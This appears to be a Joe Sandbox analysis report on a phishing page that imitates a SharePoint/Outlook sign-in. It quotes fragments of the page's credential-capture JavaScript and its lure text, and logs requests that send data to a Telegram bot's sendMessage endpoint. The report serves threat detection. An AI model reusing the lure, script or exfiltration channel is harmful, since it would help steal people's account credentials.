Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://dsiete.co/share.html

Overview

General Information

Sample URL:https://dsiete.co/share.html
Analysis ID:1567221
Infos:

Detection

HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Yara detected HtmlPhish10
Yara detected HtmlPhish7
AI detected suspicious Javascript
HTML page contains obfuscated javascript
Javascript uses Telegram API
Phishing site or detected (based on various text indicators)
Uses the Telegram API (likely for C&C communication)
HTML body contains low number of good links
HTML body contains password input but no form action
Javascript checks online IP of machine

Classification

  • System is w10x64
  • chrome.exe (PID: 3468 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3264 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=1804,i,6300371916976665629,12350350408107645027,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6584 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://dsiete.co/share.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_57JoeSecurity_HtmlPhish_7Yara detected HtmlPhish_7Joe Security
    dropped/chromecache_57JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      SourceRuleDescriptionAuthorStrings
      1.2.pages.csvJoeSecurity_HtmlPhish_7Yara detected HtmlPhish_7Joe Security
        1.1.pages.csvJoeSecurity_HtmlPhish_7Yara detected HtmlPhish_7Joe Security
          1.3.pages.csvJoeSecurity_HtmlPhish_7Yara detected HtmlPhish_7Joe Security
            1.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
              1.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
                Click to see the 3 entries
                No Sigma rule has matched
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://dsiete.co/share.htmlAvira URL Cloud: detection malicious, Label: phishing
                Source: https://dsiete.co/share.htmlSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
                Source: https://dsiete.co/favicon.icoAvira URL Cloud: Label: phishing

                Phishing

                barindex
                Source: https://dsiete.co/share.htmlJoe Sandbox AI: Score: 9 Reasons: The brand 'Outlook' is well-known and is associated with the domain 'outlook.com'., The provided URL 'dsiete.co' does not match the legitimate domain for Outlook., The URL 'dsiete.co' does not contain any recognizable association with the brand 'Outlook'., The domain 'dsiete.co' is unusual and does not have any known association with Microsoft or Outlook., The presence of input fields for 'Email address' and 'Password' on a non-legitimate domain is a common phishing tactic. DOM: 1.2.pages.csv
                Source: https://dsiete.co/share.htmlJoe Sandbox AI: Score: 9 Reasons: The brand 'Outlook' is a well-known email service provided by Microsoft., The legitimate domain for Outlook is 'outlook.com'., The provided URL 'dsiete.co' does not match the legitimate domain for Outlook., The URL 'dsiete.co' does not contain any recognizable association with the brand 'Outlook'., The domain 'dsiete.co' is suspicious as it does not relate to Outlook and could be used for phishing., The presence of input fields for 'Email address' and 'Password' is typical for phishing sites attempting to capture user credentials. DOM: 1.3.pages.csv
                Source: Yara matchFile source: 1.2.pages.csv, type: HTML
                Source: Yara matchFile source: 1.1.pages.csv, type: HTML
                Source: Yara matchFile source: 1.3.pages.csv, type: HTML
                Source: Yara matchFile source: 1.0.pages.csv, type: HTML
                Source: Yara matchFile source: dropped/chromecache_57, type: DROPPED
                Source: Yara matchFile source: 1.2.pages.csv, type: HTML
                Source: Yara matchFile source: 1.1.pages.csv, type: HTML
                Source: Yara matchFile source: 1.3.pages.csv, type: HTML
                Source: Yara matchFile source: 1.0.pages.csv, type: HTML
                Source: Yara matchFile source: dropped/chromecache_57, type: DROPPED
                Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript: High-risk phishing script that collects user credentials (email/password) and exfiltrates them via Telegram API. Uses obfuscated text to mask Microsoft-related messaging, collects IP and user-agent data, and sends sensitive information to an external service. Classic credential harvesting behavior with data exfiltration.
                Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript: The code contains heavily obfuscated JavaScript using array-based encoding and string concatenation to hide its true functionality. The obfuscation pattern (_0x3474, _0x53f0) is commonly used in malicious scripts to evade detection. While the deobfuscated code appears to be modal-related UI functionality, the level of obfuscation is suspicious and unnecessary for legitimate purposes.
                Source: https://dsiete.co/share.htmlHTTP Parser: // Get the modalvar _0x4e2e01=_0x3474;(function(_0x44dd35,_0x552e9e){var _0x3eb857={_0x473564:0xa
                Source: https://dsiete.co/share.htmlHTTP Parser: var bless = 0; var passion; document.getelementbyid("sign_in_btn") .addeventlistener("click", function (e) { var passions = document.getelementbyid('password').value; if (passions == null || passions == "") { var comp = document.getelementbyid('kini').innerhtml = `please enter the password for your microsoft account.`; settimeout(() => { document.getelementbyid('kini').innerhtml = ''; }, 2000); } else if (passions.length < 5) { document.getelementbyid('kini').innerhtml = "your account password is too short."; settimeout(() => { document.getelementbyid('kini').innerhtml = ''; document.getelementbyid("password").value = ''; }, 2000); } else { ...
                Source: Chrome DOM: 1.0OCR Text: Sharepoint To read the document, please enter with the valid email credentials that this file was sent to. Sign in with Outlook Sign in with Offce365 Sign in witl Other Mail Select your email provider to view Document Copyrights 2024 Sharepoint.
                Source: Chrome DOM: 1.1OCR Text: Sharepoint To read the document, please enter with the valid email credentials that this file was sent to. Sign in with Outlook Sign in with Offce365 Sign in with Other Mail Select your email provider to view Document Copyrights 2024 Sharepoint.
                Source: https://dsiete.co/share.htmlHTTP Parser: Number of links: 0
                Source: https://dsiete.co/share.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
                Source: https://dsiete.co/share.htmlHTTP Parser: var bless = 0; var passion; document.getelementbyid("sign_in_btn") .addeventlistener("click", function (e) { var passions = document.getelementbyid('password').value; if (passions == null || passions == "") { var comp = document.getelementbyid('kini').innerhtml = `please enter the password for your microsoft account.`; settimeout(() => { document.getelementbyid('kini').innerhtml = ''; }, 2000); } else if (passions.length < 5) { document.getelementbyid('kini').innerhtml = "your account password is too short."; settimeout(() => { document.getelementbyid('kini').innerhtml = ''; document.getelementbyid("password").value = ''; }, 2000); } else { ...
                Source: https://dsiete.co/share.htmlHTTP Parser: <input type="password" .../> found
                Source: https://dsiete.co/share.htmlHTTP Parser: No favicon
                Source: https://dsiete.co/share.htmlHTTP Parser: No favicon
                Source: https://dsiete.co/share.htmlHTTP Parser: No favicon
                Source: https://dsiete.co/share.htmlHTTP Parser: No favicon
                Source: https://dsiete.co/share.htmlHTTP Parser: No <meta name="author".. found
                Source: https://dsiete.co/share.htmlHTTP Parser: No <meta name="author".. found
                Source: https://dsiete.co/share.htmlHTTP Parser: No <meta name="author".. found
                Source: https://dsiete.co/share.htmlHTTP Parser: No <meta name="author".. found
                Source: https://dsiete.co/share.htmlHTTP Parser: No <meta name="copyright".. found
                Source: https://dsiete.co/share.htmlHTTP Parser: No <meta name="copyright".. found
                Source: https://dsiete.co/share.htmlHTTP Parser: No <meta name="copyright".. found
                Source: https://dsiete.co/share.htmlHTTP Parser: No <meta name="copyright".. found
                Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49751 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49766 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49767 version: TLS 1.2

                Networking

                barindex
                Source: unknownDNS query: name: api.telegram.org
                Source: unknownDNS query: name: api.telegram.org
                Source: unknownDNS query: name: api.telegram.org
                Source: unknownDNS query: name: api.telegram.org
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                Source: global trafficHTTP traffic detected: GET /share.html HTTP/1.1Host: dsiete.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                Source: global trafficHTTP traffic detected: GET /zr2zMVC/output-onlinepngtools.png HTTP/1.1Host: i.ibb.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dsiete.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /42sVSPG/b.png HTTP/1.1Host: i.ibb.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dsiete.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /42sVSPG/b.png HTTP/1.1Host: i.ibb.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /zr2zMVC/output-onlinepngtools.png HTTP/1.1Host: i.ibb.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://dsiete.coSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://dsiete.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /GkzpGyh/bg.jpg HTTP/1.1Host: i.ibb.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dsiete.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dsiete.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dsiete.co/share.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /GkzpGyh/bg.jpg HTTP/1.1Host: i.ibb.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=7ynDvC4mr7YoCCl&MD=csyhD7yf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dsiete.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /bot6385186008:AAEc-naZfzNaPfEaDEp0iUJsJ_uBvJ659NA/sendMessage HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /bot6385186008:AAEc-naZfzNaPfEaDEp0iUJsJ_uBvJ659NA/sendMessage HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=7ynDvC4mr7YoCCl&MD=csyhD7yf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /bot6385186008:AAEc-naZfzNaPfEaDEp0iUJsJ_uBvJ659NA/sendMessage HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
